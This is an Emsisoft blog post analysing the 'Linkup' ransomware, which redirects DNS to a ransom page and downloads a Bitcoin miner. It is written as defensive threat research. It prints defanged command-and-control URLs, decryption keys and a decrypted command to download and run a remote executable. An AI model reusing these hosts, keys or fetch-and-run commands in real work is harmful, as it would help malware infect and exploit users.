Malware Analysis: Ransomware “Linkup” Blocks DNS and Mines Bitcoins


locker-page-step3

Over the past week, the Emsisoft Malware Analysis team has been closely following a new ransomware Trojan variant that has been detected by Emsisoft Anti-Malware as Trojan-Ransom.Win32.Linkup.

“Linkup” is an interesting piece of ransomware, because unlike previous models it does not directly lock your computer or encrypt files.  Instead, Linkup blocks Internet access by modifying your DNS and can also turn your computer into a bitcoin mining robot.

 Protecting Yourself from Linkup

Users running Emsisoft Anti-Malware are automatically protected from Linkup, and should block the program when it is identified as Trojan-Ransom.Win32.Linkup.  Users who have been infected by Linkup will be blocked from Internet usage and will encounter the following “website” when attempting to browse.

locker-page-step1

What is encountered is the typical ransomware form, which in this case demands personal information and a payment method to unlock Internet usage.  The form states that you will only be charged EUR 0.01, but this is unconfirmed and most likely a blatant lie.  Do not submit any personal information!  If your computer has been infected, we advise you to find another means of connecting to the Internet and contacting Emsisoft Support to assist you with removal.

How Linkup Works

Once the Linkup Trojan has been executed, it makes a copy of itself in the %AppData%MicrosoftWindows directory named svchost.exe, a fake name meant to mimic a normal file on your computer, which is located in %windir%system32.  To mark its presence in the system, Linkup creates a mutex named tnd990r or tnd990s. We have also found that Linkup will actually disable selected Windows Security and Firewall services to facilitate infection.

new-disable-services

Once established on your PC, Linkup contacts its server to provide it with data related to your machine.  It does this by sending a POST request to the following address, transmitted in an encrypted state.

new-contacting-serverWhat kind of data is Linkup sending its server?  When decrypted the “token” value will look like this:

uid=xxxxx&ver=3.55&dl=0&il=0&dip=j5w4FFXB&wl=ENU
&wv=5.1.2600.SP3.0.256.1.2.x86&ia=1

That’s your unique user id (uid), your version of windows (ver), and the language you’re using — in this case ENU, or United States English.  This information helps facilitate infection, as Linkup must know what type of computer it is working with if it is to function.

Linkup also gives itself a layer of redundancy, so that if one host fails it can still communicate with another Command and Control server. Decryption reveals the following Command and Control hosts:

hxxp://62.75.221.37/uplink.php?logo.jpg

hxxp://hoseen45r.com/uplink.php?logo.jpg

hxxp://onetimes21s.com/uplink.php?logo.jpg

hxxp://setpec14rs.com/uplink.php?logo.jpg

Linkup decrypts the string with the following key:

IVW-Q3Xo5sBYzDTJK6LPuSrvEkAcghH8lw0GbfFe9dn_MRpqxONZam7ij2yUC14t

new-decrypt-body-string

Further analysis of Linkup’s body reveals another interesting string, which is actually another decryption key:

Fo6u-YTelBCv0Ac4XiRW_1GJSV2O8jP7nZkbwqLENshpHtg5Kxa3QMfzrUDy9dmI

This key translates commands from Linkup’s server so that the malware can perform them. Upon initial connection, the very first command that is sent looks likes this:

nK_RglbAg_3Axlb0z0bv1Bq6NokWKiej59kcg-WcKlb0f-bvara0Kdk0a0ejr1LvFFXV

Linkup decrypts this command using its key, turning it into this:

IL 62.75.221.37
RUN hxxp://91.220.163.22/pts2.exe

decryption

The first command (IL 62.75.221.37) redirects every HTTP request to the ransomware website, located at 62.75.221.37, addressed hxxp://62.75.221.37/worlds/test/index.html. At this point, Linkup will then begin to redirect your DNS so that you end up at the ransomware site whenever you browse.

To redirect every single DNS request, Linkup also makes several changes in the Windows registry, including modifying the following:

Linkup then finalizes this action by refreshing various Internet/connectivity component settings, in order to ensure the changes it made are effective immediately.  It does this by running the following commands:

new-refresh-network

This redirect is malicious enough, but what it so interesting about Linkup is that it doesn’t stop there.  Note the second line of the initial command from the server: RUN hxxp://91.220.163.22/pts2.exe.  This command instructs your computer to download and run the file pts2.exe.  What’s pts2.exe?  A downloader designed to connect your computer to a Bitcoin mining botnet!

Bitcoin Mining Botnet?

The technical processes behind “Bitcoin mining” are complex.  For a good summary, consider reading Ken Tiddel’s “Geeks Love The Bitcoin Phenomenon Like They Loved the Internet in 1995,” or Emsisoft’s  Attack on Bitcoins.

In the case of Linkup, the most important thing to understand about Bitcoin mining is that if a hacker can get more computing power, he can earn more Bitcoins.  That’s why in addition to blocking Internet browsing, Linkup also attempts to connect your computer to a Bitcoin mining botnet, which can combine the computing power of multiple infected computers to earn new Bitcoins for whoever is behind the attack.

Pts2.exe is a downloader, and it’s placed in the same directory as the fake svchost.exe file we started this analysis out with.  Behind the scenes, pts2.exe is actually formatted as Update_%random%.exe.  This is a .NET based file designed to download and execute another file from hxxp://64.32.28.155/b.exe and store it in C:UsersPublicb.exe.

pts2-downloaderUpon further analysis, our malware team identified this “other file” to be a self-extracting RAR that extracts several script files and one executable.  The SFX script executes a 64-bit PE file, named j.exe, which is jhProtominer. As the name suggests, jhProtominer is a Protoshares mining application.

This combination of ransomware and Bitcoin mining is a new and fascinating development.  At this point, however, its functionality is still quite limited as the downloaded jhProtominer only works on 64-bit operating systems.  In time, it will be interesting to see if Linkup is modified to download more flexible variants.

Hashes of files analyzed in this article

What do you think about Linkup?

In the coming weeks, Emsisoft’s Malware Analysis team will be keeping a close eye on Linkup, as the malware will inevitably evolve. We have provided this analysis because Linkup represents a new approach to infection, which combines two known techniques — ransomware and Bitcoin mining — to create one potent form of money making malware.

If you have any questions about Linkup, we encourage you to contact Emsisoft Support directly. There, you can share your thoughts or even your own discoveries to help Emsisoft in its mission of making the world a more malware-free place.  In the meantime, steer clear of the mines, and have a great (ransomware-free) day!

Emsisoft Enterprise Security + EDR

Robust and proven endpoint security solution for organizations of all sizes. Start free trial

 

Senan Conrad

Senan Conrad

Senan specializes in giving readers insight into the constantly and rapidly changing world of cybersecurity. When he’s not tapping away at his keyboard, he enjoys drinking a good coffee or tinkering in his workshop.

What to read next